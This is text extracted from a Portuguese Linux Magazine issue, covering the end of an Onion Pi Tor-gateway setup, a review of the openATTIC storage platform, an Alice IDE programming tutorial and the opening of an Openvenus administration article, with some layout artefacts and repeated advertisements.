Listagem 4: Ativação de regras iptablesiptables ‑t nat ‑A PREROUTING ‑i wlan0 ‑p tcp ‑‑dport 22 ‑j REDIRECT ‑‑to‑ports 22 iptables ‑t nat ‑A PREROUTING ‑i wlan0 ‑p udp ‑‑dport 53 ‑j REDIRECT ‑‑to‑ports 53 iptables ‑t nat ‑A PREROUTING ‑i wlan0 ‑p tcp ‑‑syn ‑j REDIRECT ‑‑to‑ports 9040

Listagem 1: Configuração DHCPsubnet 192.168.42.0 netmask 255.255.255.0 { range 192.168.42.10 192.168.42.50; option broadcast‑address 192.168.42.255; option routers 192.168.42.1; default‑lease‑time 600;

58 www.linuxmagazine.com.br

no arquivo notices.log, precisamos primeiro criar o arquivo e atribuir as permissões necessárias:

touch /var/ log/ tor/ notices.log chown debian‑tor / var/ log/ tor/ notices.log chmod 644 / var/ log/ tor/ notices.log

Finalmente, podemos reiniciar o Tor, digitando o comando servi‑ce tor start. Para o serviço iniciar automaticamente após o reboot, digite update‑rc.d tor enable. Para usar o Tor, precisamos simples-mente fazer login na nova WLAN. Para descobrir se a configuração está funcionando como o espera-do, acesse “Are you using Tor?” [6] (figura 2). Se estiver, a mensagem “Congratulations. Your browser is configured to use Tor” (“Parabéns. Seu navegador está configurado para usar o Tor”) será exibida.

ConclusãoO Onion Pi oferece aos usuários uma opção para operar um ser-vidor de gateway transparente e manter o anonimato do recurso principal: o endereço IP. A con-figuração chata de aplicativos clientes individuais é, portanto, uma coisa do passado. Ao con-trário de um proxy Tor operado localmente, a configuração torna anônima mais do que o fluxo de dados de apenas alguns aplica-tivos e estende- se a todo o trá-fego de Internet. n

Gostou do artigo?Queremos ouvir sua opinião. Fale conosco em: cartas@linuxmagazine.com.brEste artigo no nosso site: http://lnm.com.br/article/9103

Figura 2 Se as configurações do Onion Pi funcionarem, esta mensagem de confir-mação será exibida quando for verificada a configuração online do Tor.

Mais informações[1] Onion Pi: http://learn.adafruit.com/onion‑pi [2] Extensão 1Button App, da Amazon: http://threatpost.com/amazon‑1button‑browser‑add‑on‑leaks‑data‑in‑plain‑text [3] Chaos Computer Club: http://en.wikipedia.org/wiki/Chaos_Computer_Club [4] Raspbian: http://www.raspberrypi.org/downloads [5] Projeto netfilter/iptables:http://www.netfilter.org/projects/iptables/ [6] Are you using Tor? https://check.torproject.org

66 www.linuxmagazine.com.br

Armazenamento limpoO openATTIC promete o gestão de armazenamento unificado para meios heterogêneos. A interface web facilita o serviço e suporta drives de rede acessados via SMB e NFS.por Martin Loschwitz

Se perguntarmos a cinco pes-soas qual é a definição de um armazenamento unificado,

receberemos sete respostas con-traditórias. Mais e mais fornecedo-res de soluções de armazenamento pré-configuradas aproveitaram este problema e apresentaram seus produtos como o verdadeiro “armazenamento unificado”. Co-nheça o openATTIC [1], e agradeça a Deus por ele: o projeto promete ser um sistema de gerenciamento de armazenamento com protocolo cruzado verdadeiramente unifica-do e com base em componentes de código aberto (figura 1).

A IT Novum [2] é a força mo-triz por trás do openATTIC. A empresa anuncia seu produto como um framework de geren-ciamento de armazenamento em código aberto. E seu produto propõe generalizar e agregar o gerenciamento de praticamente qualquer tipo de armazenamen-to sob uma interface unificada e fácil de usar [3]. O OpenATTIC é uma solução relativamente nova, mas a IT Novum possui ideias bem definidas sobre como desejam comercializá-lo. O core é a versão Community (a versão descrita neste artigo), que con-

tém a maior parte dos recursos e está disponível sob uma licença livre. A versão Enterprise, que a Novum também oferece, inclui suporte adicional em vários mo-delos até 24/7, mas a um preço: o suporte padrão sai por pouco menos de 3.000 euros por ano; o pacote “XX-Large” pode chegar a 50.000 euros ou mais (quadro 1).

A interface web do OpenAT-TIC, um de seus componentes mais importantes, permite que os administradores gerenciem o armazenamento, criem ações para vários serviços e excluam recursos. Ela também fornece aos administradores a capacida-de de lidar com todas as outras tarefas que surgem no contexto do espaço de armazenamento, tais como a criação de interfaces de rede. Aplicativos externos podem até mesmo gerenciar o armazenamento diretamente, graças à API openATTIC.

Antes que possamos explorar as maravilhas do openATTIC, no entanto, temos que sobreviver à instalação, e é aí que as nuvens negras começam a se reunir. Uma coisa logo se torna clara: o Ope-

Redes

Figura 1 O openATTIC permite gerenciar unidades locais, volumes NFS, con-tas FTP e compartilhamentos Samba a partir de uma única interface web.

Quadro 1: Benefícios comerciais Além do suporte, a versão comercial oferece recursos como o Snap Apps, que cria snapshots consistentes de sistemas virtuais e bancos de dados (os snapshots na versão comunitária só permitem imagens em um disco ou baseadas em sistemas ZFS). Sob a forma de SMI-S, o openATTIC Enterprise pretende fornecer, no futuro, uma interface independente de fornecedor para gerenciamento de tarefas, mas, de acordo com a IT Novum, este recurso ainda está em desenvolvimento. A oferta de suporte na variação Enterprise da IT Novum durante a instalação do openATTIC é certamente interessante.

67Linux Magazine #108 | Fevereiro de 2014

nATTIC ainda não é um produto acabado para uso geral em siste-mas Linux. Os desenvolvedores estão atualmente programando openATTIC para Debian Testing. Para tornar o produto compa-tível com o Debian GNU/Linux 6.0 (squeeze), eles fornecem um script chamado Backport.sh, que faz o backport de alguns pacotes da distribuição do projeto de teste do Debian para o squeeze.

Esta abordagem levanta pre-ocupações: é difícil explicar por que os desenvolvedores do ope-nATTIC não oferecem pacotes pré-compilados para as ferramen-tas necessárias sob a forma de um repositório APT, ao invés de um script Shell bruto. Se estiver preparado para assumir o traba-lho do backporting ou instalar o Debian wheezy, pelo menos po-derá colher os frutos dos pacotes pré-compilados para openATTIC.

Mas estes pacotes não fun-cionam exatamente da maneira esperada como pacotes Debian típicos: depois de instalar o pa-cote openattic, uma mensagem debconf é exibida pedindo para executar o script Shell oacon‑fig install após a instalação. Os administradores também preci-sam marcar os volumes lógicos existentes que pertencem ao sistema, e qual openATTIC deve ficar sozinho, fora dos limites. E

os milhões de azarados que não usam Debian, mas alguma outra distribuição? As instruções de instalação, além das instruções Debian já mencionadas, não pa-recem existir. Usar o openATTIC em uma distribuição que não seja Debian provavelmente exigirá coragem e nervos de aço.

Primeiros passosAo efetuar login na interface ad-ministrativa web, o openATTIC apresenta uma verdadeira cor-nucópia de recursos. O layout da guia de interface de usuário é clássica: à esquerda, há uma lista dos vários módulos; à direita, o conteúdo do módulo selecionado à esquerda. Cada tipo de tarefa está atribuída a seu próprio menu no painel de controle: no topo es-tão as páginas que fornecem uma visão geral do estado do sistema openATTIC. Além das mensagens de log do sistema host e uma

visão aprimorada do gráfico do armazenamento utilizado e dis-ponível, o usuário irá se deparar com muitos recursos úteis. Por exemplo, o ambiente vem com uma implementação do Nagios 3, que monitora as estatísticas vitais do cluster e aciona o alarme.

A configuração de monitora-mento do Nagios é totalmente automatizada; os administrado-res não têm que lidar com a com-plexidade interna do Nagios. O openATTIC completa este ponto de vista, com tabelas e gráficos que revelam claramente a his-tória da rede e oferecem pistas para encontrar problemas de desempenho futuros.

Hardware de armazenamentoO gerenciamento de dispositivos de armazenamento físico está lo-calizado abaixo das estatísticas e visão geral dos recursos. O ope-nATTIC suporta muitos tipos de dispositivos de armazenamento físico e permite fácil administra-ção usando a interface web. Logo abaixo de Disks, encontraremos uma lista de discos que são locais para a máquina, incluindo os gru-pos de volume criados em LVM. Alternativamente, podemos usar este menu para gerenciar dispo-sitivos de armazenamento SAN que estão ligados ao host, por exemplo, via iSCSI.

Figura 2 Gerenciamento de dispositivos iSCSI no openATTIC.

Figura 3 Gerenciamento de recursos NFS no openATTIC.

68 www.linuxmagazine.com.br

Gerenciamento de volumesA tela Volume Management (figura 2) supervisiona os volumes de arma-zenamento e outros recursos: se o usuário deseja que a máquina openATTIC use um volume para um propósito específico, como uma exportação NFS (figura 3) ou um compartilhamento Samba, precisa primeiro criar o volume. No mesmo menu, irá encontrar o recurso snapshot, que permite criar snapshots de dispositivos de armazenamento e volumes. Consi-deração importante: o OpenATTIC também suporta ZFS. Se o usuá-rio confiar no iSCSI em sua rede, também pode usar a interface web para criar iSCSI LUNs, que poderá, então, integrar como discos locais nos servidores de destino.

Em uma configuração de TI madura, o acesso ao armazena-mento é desejável não só em nível de bloco, mas também através de vários protocolos de arquivos de rede, como NFS ou Samba. Muitas vezes, estes pro-tocolos e serviços de arquivos de rede são distribuídos através de vários servidores na rede e não são manipuláveis centralmente. Embora o openATTIC prometa por um fim a este caos, ele con-segue isso apenas em parte: o ambiente realmente instala to-dos os componentes necessários, como NFS, FTP e servidor Samba, e podemos gerenciar todas essas ferramentas maravilhosamente através do menu Shares na in-terface web. Um volume previa-mente criado, por exemplo, que está disponível como um disco local, pode, assim, ser partilha-do rapidamente através do NFS.

O mesmo se aplica aos com-partilhamentos do Samba. Se o administrador tiver operado os passos adequados na interface

web, configurar um compartilha-mento Samba para acesso por um cliente Windows é fácil. Tendo em vista essas características, a qualidade do openATTIC é muito impressionante; no laboratório, fomos capazes de criar e usar to-dos os volumes, como prometido. Por outro lado, o openATTIC é deficiente em situações onde a configuração adicional comple-xa é necessária; por exemplo, a interface web ainda não tem como suportar o Samba se co-municando com o LDAP.

Gerenciamento de sistema e alta disponibilidadeO fato de que o openATTIC não serve somente para o geren-ciamento do armazenamento é claramente evidenciado pelos recursos adicionais disponíveis na interface web. Em essência, o openATTIC é quase uma ferra-menta para administração geral do sistema. Por exemplo, pode-mos editar as placas de interface de rede do sistema através da interface web. Em Online Upda-te, o openATTIC fornece um ge-renciador de atualização gráfica que executa o aptitude ao fundo. O openATTIC automaticamente descobre que os pacotes são atu-alizáveis de uma forma regular; só precisamos acionar esta ação.

Os desenvolvedores também consideraram um outro requi-sito essencial dos sistemas de armazenamento: a alta dispo-nibilidade (HA). No openATTIC, podemos implementar a alta dis-ponibilidade através do recurso Peers: para uma configuração HA completa, inicialmente pre-cisamos construir dois sistemas openATTIC, cada um com sua própria chave API. Na interface web, abaixo de Peers, podemos

conectar as duas entidades. Se o pacote openattic‑module‑drbd é ins-talado, podemos proceder para configurar a replicação.

Se bem sucedido, o openAT-TIC com Distributed Replicated Block Device (DRBD) garante que as máquinas openATTIC individuais sempre mantenham seus dados em sincronia. A úni-ca coisa desagradável é que o conjunto obrigatório de pro-gramas de alta disponibilidade, compreendendo o Pacemaker e o Corosync, não pode ser con-figurado através da interface web em openATTIC, mas requer o uso de software adicional, como o Linux Cluster Manage-ment Console (LCMC) [4]. Dado o fato de que a implementação de uma interface gráfica abran-gente para Linux HA é extrema-mente complicada, é perdoável que o openATTIC não ofereça o recurso na fase inicial. Seria preferível para o openATTIC integrar automaticamente o DRBD em um gerenciador de cluster existente.

ConclusãoO openATTIC é promissor, mas, em seu estado atual, ainda leva os administradores a uma mon-tanha russa de emoções. Por um lado, o objetivo de fornecer um front-end de gerenciamento para várias tecnologias de armazena-mento para acabar com a selva de armazenamento é realmente muito bem-sucedida. Após a ins-talação, o ambiente é um conjun-to completo de gerenciamento para qualquer tipo de armaze-namento; o que reduz, assim, o incômodo de se trabalhar com muitos protocolos diferentes.

O fato de várias instâncias openATTIC poderem se conectar umas com as outras através da API livre, e também poderem ser

Os sistemas modernizam-se assim

como suas vulnerabilidades.

Saiba como tirar o máximo proveito

da tecnologia com segurança

ADQUIRA O SEU EXEMPLAREM NOSSA LOJA VIRTUAL

LNM.COM.BR/SHOPPINGWindows • Linux • Unix • Solaris

FIREWALL p. 26

Segurança avançada no fi rewall

do Windows Vista/Server 2008

OS SISTEMAS MODERNIZAM-SE ASSIM COMO SUAS VULNERABILIDADES.

SAIBA COMO TIRAR O MÁXIMO PROVEITO DA TECNOLOGIA COM SEGURANÇA

ADMINRedes & Segurança

SEGU

RA

NÇ

A V

IRTU

AL H

YPER-V VIRTUALIZA

ÇÃO

VIRTUALBOX FIREW

ALL O

PENLAVA

HO

NEYPOTM

E NEXEN

TA N

ETGEA

R POW

ERSHELL

AD

MIN

MA

GA

ZIN

E #

10

06

/20

13

# 10 JUNHO/2013

Como obter o máximo desempenho em ambientes virtualizados p.13

Utilize um simples navegador para controlar

remotamente máquinas virtuais com VirtualBox p.16

Conheça as melhorias da versão 3.0 do Hyper-V p.20

OPENLAVA p. 50

Compartilhe sistemas de alto desempenho

através deste poderoso gerenciador de recursos

VEJA TAMBÉM NESTA EDIÇÃO:

Nexenta VS. Netgear: saiba qual é a melhor plataforma de compartilhamento p.32

PowerShell em linha de comando: muito mais poderoso p.45

MARCELO BRANQUINHO p.23

Antecipe-se aos problemas

CEZAR TAURION p.10

Cloud nas quatro ondas tecnológicasSEGURANÇA

O hardware está mudando

constantemente com novas

CPUs, aceleradores e a

integração de ambos.

Como saber quais

processadores são ideais

para cada código?

p. 57

SEGURANÇA

W W W . A D M I N - M A G A Z I N E . C O M . B R

exemplar de

Assinantevenda proibida

HONEYPOT p. 68

Identifi que ataques e vulnerabilidades

em sistemas com o HoneypotMe

69Linux Magazine #108 | Fevereiro de 2014

incorporadas em uma solução de alta disponibilidade, é impressio-nante. No entanto, a instalação é difícil, e um script Shell obs-curo não inspira confiança; para piorar a situação, o openATTIC atualmente só funciona de for-ma confiável no Debian Wheezy.

Muito provavelmente, a esco-lha da distribuição é em grande parte devido às preferências pessoais dos desenvolvedores openATTIC. De acordo com de-clarações de Steffen Rieger, que administra o desenvolvimento do openATTIC na Novum IT, o Wheezy realmente é a distribui-ção recomendada. Mas é aí que reside o problema: a posição de mercado que o openATTIC adota atualmente não é muito significativa. SUSE e Red Hat possuem seus próprios dispo-sitivos de armazenamento que oferecem conjuntos de recursos

semelhantes aos do openATTIC. Se o projeto quer competir com essas soluções, é imperdoável não possuir pacotes pré-compilados para todas as distribuições cor-porativas. Mas, se o openATTIC quer ser um dispositivo de ar-mazenamento independente, que pode ser instalado a partir de um CD, a questão recai sobre

por que o projeto não fornece uma imagem correspondente.

A solução de armazenamento openATTIC é fantástica e ofe-rece muitos benefícios. Mas, a menos que acrescente uma versão Enterprise, o projeto permanecerá oculto para muitos tomadores de decisões focados em soluções empresariais. n

Mais informações[1] openATTIC: http://www.open‑attic.org/en/home.html [2] IT Novum: http://www.it‑novum.com/en/home.html [3] openATTIC documentation: http://www.open‑attic.org/en/community/doku.html [4] Console de Gerenciamento de Cluster Linux: http://lcmc.sourceforge.net/

Gostou do artigo?Queremos ouvir sua opinião. Fale conosco em: cartas@linuxmagazine.com.brEste artigo no nosso site: http://lnm.com.br/article/9112

Os sistemas modernizam-se assim

como suas vulnerabilidades.

Saiba como tirar o máximo proveito

da tecnologia com segurança

ADQUIRA O SEU EXEMPLAREM NOSSA LOJA VIRTUAL

LNM.COM.BR/SHOPPINGWindows • Linux • Unix • Solaris

FIREWALL p. 26

Segurança avançada no fi rewall

do Windows Vista/Server 2008

OS SISTEMAS MODERNIZAM-SE ASSIM COMO SUAS VULNERABILIDADES.

SAIBA COMO TIRAR O MÁXIMO PROVEITO DA TECNOLOGIA COM SEGURANÇA

ADMINRedes & Segurança

SEGU

RA

NÇ

A V

IRTU

AL H

YPER-V VIRTUALIZA

ÇÃO

VIRTUALBOX FIREW

ALL O

PENLAVA

HO

NEYPOTM

E NEXEN

TA N

ETGEA

R POW

ERSHELL

AD

MIN

MA

GA

ZIN

E #

10

06

/20

13

# 10 JUNHO/2013

Como obter o máximo desempenho em ambientes virtualizados p.13

Utilize um simples navegador para controlar

remotamente máquinas virtuais com VirtualBox p.16

Conheça as melhorias da versão 3.0 do Hyper-V p.20

OPENLAVA p. 50

Compartilhe sistemas de alto desempenho

através deste poderoso gerenciador de recursos

VEJA TAMBÉM NESTA EDIÇÃO:

Nexenta VS. Netgear: saiba qual é a melhor plataforma de compartilhamento p.32

PowerShell em linha de comando: muito mais poderoso p.45

MARCELO BRANQUINHO p.23

Antecipe-se aos problemas

CEZAR TAURION p.10

Cloud nas quatro ondas tecnológicasSEGURANÇA

O hardware está mudando

constantemente com novas

CPUs, aceleradores e a

integração de ambos.

Como saber quais

processadores são ideais

para cada código?

p. 57

SEGURANÇA

W W W . A D M I N - M A G A Z I N E . C O M . B R

exemplar de

Assinantevenda proibida

HONEYPOT p. 68

Identifi que ataques e vulnerabilidades

em sistemas com o HoneypotMe

70 www.linuxmagazine.com.br

Procurando NemoAssim como podemos usar nosso ambiente de desktop, também podemos escrever programas para ele: tudo o que precisamos é um mouse, o Alice IDE, e algum tempo de aprendizado.por Tim Schürmann

No ambiente de desen-volvimento

Alice, não precisamos digitar um único comando

ou aprender uma linguagem di-ferente. Em vez disso, podemos criar aplicativos e compilar todas

as ações e processos necessários apenas usando o mouse. Come-çamos arrastando itens prontos para um mundo 3D. Cada item oferece diversas ações que alte-ram sua aparência, localização, ou comportamento. Depois, po-demos simplesmente arrastar e soltar as ações desejadas em um

plano sequencial, que o Alice executa sob demanda.

Controles simples certa-mente têm seus limites. Por exemplo, os aplicativos criados aqui são sempre rooteados no mundo 3D. O Alice é, portanto,

adequado principalmente para animações 3D ou jogos. O re-quisito quase obrigatório para o mundo 3D é que o Linux suporte aceleração 3D da placa de vídeo; caso contrário, o programa que o usuário criar será executado no ritmo de uma lesma.

VersõesO Alice [1] atualmente existe em duas versões. De acordo com os fabricantes, os iniciantes devem usar a versão 2, mais antiga. Esta versão ensina o raciocínio lógico e os conceitos básicos de pro-gramação. A nova versão 3, no entanto, concentra-se na pro-gramação orientada a objetos e

tem usado de forma crescente a terminologia padrão encontrada na área, permitindo assim uma transição posterior mais suave para o Java.

A abordagem básica é a mes-ma em ambas as versões, sendo a principal diferença a interface de usuário e terminologia um pouco diferentes. Neste artigo, nos concentraremos na versão 3.1, mas a maioria das explicações também se aplicam ao Alice 2.3. O ambiente de programação, desenvolvido na Universidade Carnegie Mellon, em Pittsbur-gh, Pensilvânia, EUA, não é soft-ware livre. Apesar de o Alice ser publicado sob uma licença livre, não está disponível em código aberto. A instalação do IDE é descrita no quadro 1.

ConfiguraçãoDepois de iniciar o ambien-te de programação, será exibi-da a janela mostrada na figura 1. Primeiro precisamos selecionar o plano de fundo para o mundo 3D. No exemplo a seguir, queremos um peixe nadando em um mundo subaquático, por isso escolhemos SEA_FLOOR. Clicar em “OK” abrirá a ja-nela principal mostrada na figura 2. Como a janela consome uma gran-

Programação

Quadro 1: Dica Se quiser se livrar de uma ação a partir do editor de código, basta arrastá-la de volta para a lista na parte inferior esquerda. Uma lixeira aparece, e basta soltar o o item sobre ela.

71Linux Magazine #108 | Fevereiro de 2014

de quantidade de espaço, o usuário desejará que ela preencha toda a tela. O painel superior esquerdo é a exibição da cena, o canto inferior esquerdo é o painel de métodos, a grande janela da direita é o editor de código e a margem na parte in-ferior direita responde pelas tiles de controle.

Por enquanto, analisaremos o painel da cena, onde observare-mos o mundo subaquático 3D atu-almente vazio. Pressione o botão Setup scene para preenchê-lo com um peixe, ou selecione Window/Perspectives/Setup Scene a partir do menu. O Alice agora muda para a visualização exibida na figura 3, onde o mundo 3D ocupa a maior parte da janela principal.

Na linha de fundo, a paleta con-tém todos os itens disponíveis. Para ajudar a manter o controle dos objetos, o Alice classifica-os em categorias. Flyer Classes, por exemplo, são todos os objetos que podem “voar” – atualmente, apenas pássaros. Pressionar All Classes retorna para a visão ge-ral. Um agrupamento alternativo está disponível na guia Browse

Gallery By Theme. Se olhar para o oceano, por exemplo, todos os objetos serão adequados para um cenário subaquático. Final-mente, podemos clicar na guia Search Gallery para buscar um objeto específico.

Para o cenário subaquático desejado, altere para a guia Bro-wse Gallery By Theme e selecio-ne o tema Ocean. Em seguida, mantenha pressionado o botão esquerdo do mouse sobre o pe-queno peixe-palhaço amarelo e arraste-o para o mundo subaquá-tico; contudo, não solte o botão do mouse ainda. Um cubo amarelo aparece no mundo (figura 3). Ar-raste o peixe-palhaço até o local onde deseja que ele permaneça.

No exemplo, o transferimos para o lado esquerdo da janela. O usuário irá notar que o Alice sempre localiza o objeto um pouco acima do chão – o que não é exatamente perfeito para um peixe flutuante, mas não é algo que possamos mudar neste momento. Depois de ter encon-trado uma posição adequada, solte o botão do mouse. Será

exibida a janela ilustrada na figura 4, que mostra que cria-mos um novo objeto do tipo ClownFish no mundo 3D. Para reutilizar o objeto facilmente mais tarde, crie um nome para o peixe na caixa de nome (por exemplo, “Nemo”) e pressio-ne “OK” para fechar a janela.

Mecanismo de elevaçãoO pequeno Nemo aparece agora no mundo subaquático. Um círcu-lo verde indica que está selecio-nado (figura 5). Podemos arrastar e soltar para mover o peixe por aí livremente; clicar em uma das setas curvas na parte inferior do mundo 3D permite alterar a perspectiva. Para este exemplo, no entanto, podemos ficar com o ângulo de visualização atual.

Na borda direita da janela, o usuário encontrará uma paleta com todas as propriedades do objeto (no Alice 2, eles estão lo-calizados na guia Properties, na parte inferior esquerda). Pode-mos usar a lista drop-down Paint para especificar uma cor diferente para Nemo. O valor de opacida-de define o quão transparente o peixe será. Um valor de 1.0 torna Nemo completamente visível, e 0,5 o torna semivisível.

Figura 1 Após a inicialização, o Alice oferece diversos substratos para o mundo 3D. Se não tiver certeza, escolha qualquer um deles; po-demos substituí-lo mais tarde com um fundo colorido, por exemplo.

Figura 2 A janela principal do Alice que aparece depois de selecionarmos o fundo tem uma boa quantidade de espaço por conta dos muitos elementos.

72 www.linuxmagazine.com.br

Podemos usar o campo Vehi-cle para encadear Nemo a outro objeto. Em seguida, ele passará a seguir automaticamente cada movimento do objeto escolhi-do. Particularmente interes-santes são os valores para Posi-tion e Size do elemento Nemo. Primeiro, devemos levantar o peixe do chão um pouco, para que ele possa nadar livremen-te. Para fazer isso, digite o va-lor 0,5 em y e pressione a tecla [Enter]. O Alice agora levanta o peixe (figura 5). Introduzir um valor em x moveria Nemo para um plano horizontal, e um va-lor z o moveria para frente ou para trás. O tamanho padrão de Nemo é perfeito para o exemplo.

Perdidos no espaçoAssim como o peixe, mais alguns objetos estão na cena: além do fundo, temos uma câmera atra-vés da qual podemos olhar dire-tamente para o oceano. No canto superior esquerdo da janela, o Alice lista todos os objetos, com destaque para o objeto atual-mente selecionado em amarelo.

A câmera e o solo também têm propriedades que podem ser modificadas. Para fazer isso, clique sobre o nome do objeto correspondente no canto supe-rior esquerdo ou selecione-o na borda direita do menu de seleção,

atualmente rotulado como this.Nemo. Essa ação permite modifi-car retroativamente o fundo. O mundo 3D também é um objeto em si mesmo, com o nome “this” pouco intuitivo. No entanto, isso permite mudar a iluminação de todo o ambiente ou envolvê-lo em um nevoeiro: na lista drop--down, clique uma vez sobre ele e examine as propriedades. Os nomes dos outros objetos come-çam assim porque se encontram no ambiente.

Se quiser que Nemo nade para frente e para trás, precisará de uma sequência correspondente. Pressione o botão Edit Code ou selecione Window/Perspectives/

Edit Code para retornar à visu-alização anterior, onde se visu-aliza Nemo no canto superior esquerdo. Logo abaixo, encon-traremos uma lista de todas as ações e truques que Nemo tem na manga. Poderíamos falar com ele, por exemplo, ou movê-lo. Ali-ce refere-se a todas essas ações como procedimentos.

Girando a rodaEm seguida, desejamos que Nemo nade toda a tela para a direita. No momento, ele está olhando para a frente, de modo que o primeiro passo é apontá-lo para a direita. Na lista, encontre o procedimento para girar (na seção de orienta-

Figura 3 Nesta visualização, podemos preencher o mundo 3D com os objetos.

Figura 4 Nesta janela, digite um novo nome para o objeto recém-criado. No exemplo, o peixe é chamado de Nemo.

Figura 5 Nesta janela, digite um novo nome para o objeto recém-criado. No exemplo, o peixe é chamado de Nemo.

73Linux Magazine #108 | Fevereiro de 2014

ção) e, em seguida, arraste esta ação a um ponto da página ainda vazio no lado direito aonde se lê “drop statement here” (no Alice 2: “Do nothing”).

Alice agora quer saber em qual direção deve rotacionar Nemo. Para o peixe olhar para a direita, ele precisa rotacionar para a es-querda. Em outras palavras, diga-mos Left. Depois, preenchemos o valor para rotacionar Nemo. Nes-te caso, o valor é de 0,25 (figura 6), que é um quarto de rotação em

torno do próprio eixo de Nemo. Para verificar, clique no botão Run. Isso abrirá uma nova janela na qual Nemo olha para a direi-ta (figura 7). Feche a janela nova-mente. Note que poderíamos ter rotacionado Nemo para a direita na visualização Scene clicando em Rotation no canto superior direi-to e, em seguida, arrastando um dos aros em torno de Nemo para a direita com o mouse.

Em seguida, queremos que Nemo nade para a direita. Po-

demos fazer isso com o proces-so Move. Arraste o recurso para fora da lista no lado esquerdo para a direita abaixo da ação Turn. Se quiser que Nemo nade para a frente, selecione Forward a partir da lista. Um valor de 2,0 faria com que Nemo flutuasse no meio da tela, enquanto que 10,0 o faria desaparecer de vista. As-sim, é preciso pressionar Custom DecimalNumber, digitar um valor de 3,5 na calculadora pop-up e, em seguida, pressionar OK.

Agora, ao pressionar Run, Nemo nada para a direita. No entanto, a coisa toda ainda fun-ciona de forma relativamente rápida. Para mudar isso, clique em Add detail na ação Move. Para influenciar a duração da natação, podemos selecionar duração e depois 2.0. Isto irá re-tardar a animação pela metade.

Para todo o sempreNo final das contas, Nemo preci-sa aprender a se virar. Para que isso aconteça, arraste a curva de rotação para uma posição abaixo das outras duas no editor. Nemo precisa girar no sentido horário (direita) por um valor de 0,5. Ele, então, olha para a esquerda no-vamente. Com mais uma ação de movimento, Nemo flutua direto à sua posição inicial (para frente) com um valor de 3,5. Mais uma vez, digite isso como um Custom DecimalNumber. Para simplificar, podemos manter o valor padrão para a velocidade.

Finalmente, Nemo deve olhar para a frente novamente. Para isso, arraste o processo Turn para o editor mais uma vez e rotacione Nemo por 0,25. O programa deve aparecer agora como mostrado na figura 8. Depois de iniciar o código pressionando Run, Nemo nada para

Figura 6 Se um procedimento requer um ajuste, basta selecioná-lo a partir de uma lista de especificações.

Figura 7 Nemo gira em seu mundo. Podemos pausar e reiniciar o fluxo do programa usando os botões correspondentes na borda superior.

74 www.linuxmagazine.com.br

a direita, se vira, nada de volta, e olha diretamente atrás do usuário.

Para comunicar ao Nemo que deve nadar para a direita nova-mente, normalmente seria ne-cessário reiniciar o programa. Felizmente, o Alice também pode executar procedimentos em um loop. Para fazer isso, feche a jane-la de pré-visualização e siga até os Control tiles no canto inferior direito, onde Alice oculta alguns movimentos especiais. No editor, arraste para uma posição acima de todos os procedimentos an-teriores. O Alice indica isso com uma linha verde, onde insere a ação, se o usuário mover o cursor com o botão do mouse.

A partir do menu drop-down, selecione True (examinaremos isso mais adiante). Mova todos os procedimentos existentes para uma posição entre while e loop. O resultado deve ser como o exibido na figura 9. Definimos um loop infinito: enquanto o valor true é igual a true (ou seja, sempre) Alice irá realizar todos os

procedimentos até o loop. Dessa maneira, Nemo nadará indefini-damente para frente e para trás. Podemos verificar isso pressio-nando Run. Para interromper o programa, basta fechar a janela.

FuturoA condição de teste próxima ao while é obviamente trivial. Em vez disso, podemos definir uma con-dição mais complexa para comu-nicar a Nemo que deve começar a nadar somente se outro peixe colidir com ele. As funções são especialmente úteis na elabora-ção de uma condição de teste; os encontraremos em uma guia no painel esquerdo. As funções retornam valores como a locali-zação do Nemo, tamanho ou cor.

Quando passamos o mouse so-bre uma das funções, Alice marca locais no editor onde podemos usá-los. Assim como o Nemo, os outros objetos no mundo 3D também têm procedimentos e funções. Alice enumera-os se cli-carmos sobre eles na cena, ou se os selecionarmos na lista drop-do-wn de grandes dimensões abaixo da pré-visualização. Finalmente, observe que Nemo é composto por várias partes que podemos mover ou manipular indepen-

dentemente uma da outra. Se quiser que o peixe agite a cauda, selecione this.Nemo na grande lista drop-down, e depois passe para o pequeno triângulo e selecione this.Nemo.getTail. Todos os proce-dimentos e funções exibidos na lista referem-se apenas à cauda. Desta forma, podemos animar a cauda durante o mergulho.

ConclusãoProgramação não é tão difícil. Com Alice, alguns cliques do mouse são o suficiente para dei-xar um peixe nadar no mar. Esta animação simples apenas arranha a superfície das possibilidades do ambiente de desenvolvimento. Se o usuário gostou de trabalhar com Alice até agora, pode sim-plesmente experimentar outros procedimentos e funções. Pode aguardar por um fim de semana chuvoso, ou de folga para a ex-perimentação: o Alice é viciante e o tempo voa quando estamos nos divertindo com ele.

Uma visão geral da interface do usuário é fornecida pela aju-da online [2], guias detalhados, screencasts do “Alice 3.1 curri-culum resources” [3], e vários livros que fazem referência ao Alice 2 [4]. n

Figura 8 Nesta janela, digite um novo nome para o objeto recém-criado. No exemplo, o peixe é chamado de Nemo.

Figura 9 O loop while permite que os peixes nadem para frente e para trás em um padrão infinito e predeterminado de movimento.

Mais informações[1] Alice: http://www.alice.org

[2] Alice online help: http://help.alice.org/w/page/57584293/Getting%20 Started%20with%20Alice%203_1

[3] Alice 3.1 Curriculum Resources: http://www.alice.org/index.php?page=3.1/download_materials

[4] Livros sobre Alice 2: http://www.alice.org/index.php?page=documentation

Gostou do artigo?Queremos ouvir sua opinião. Fale conosco em: cartas@linuxmagazine.com.brEste artigo no nosso site: http://lnm.com.br/article/9103

75Linux Magazine #108 | Fevereiro de 2014

A face de VênusA plataforma Openvenus visa simplificar a vida do administrador; ela executa comandos contra grupos de servidores e distribui arquivos ou softwares diretamente de uma localização central. por Konstantin Agouros

O trabalho diário de um ad-ministrador compreende muitas tarefas, algumas

das quais muito tediosas: envolve a instalação de patches, a criação de novos servidores ou até mesmo fazer alterações em todos os com-putadores da empresa. A virtualiza-ção e a computação em nuvem não melhoram essa situação, pois a cria-ção de um novo servidor virtual ba-

seado em

uma imagem mestre é feita rapida-mente, e a inclinação é, portanto, fazê-lo mais vezes do que o neces-sário. No entanto, a manutenção e o gerenciamento da atual cole-ção de imagens requer o mesmo esforço que seria empregado em um dispositivo dedicado.

Para agilizar as tarefas, os admi-nistradores tendem a escrever os próprios conjuntos de ferramentas ou personalizar soluções existentes para gerenciar sua lista de tarefas de forma eficiente. O scVenus [1] da Science+ Computing é um des-ses softwares de gerenciamento comercial. O desenvolvedor Al-bert Flügel ficou bastante impres-sionado pela scVenus quando foi contratado como administrador de sistemas em um ambiente de grande porte. O cliente usou o scVenus para gerenciar milhares

de usuários. Quando a licença para o framework ex-

pirou, no entanto, a equipe de adminis-tradores enfrentou o problema de con-tinuar a gerenciar o que, em alguns casos, eram versões de sistemas opera-cionais antigos.

Mudar para uma solução mais versátil

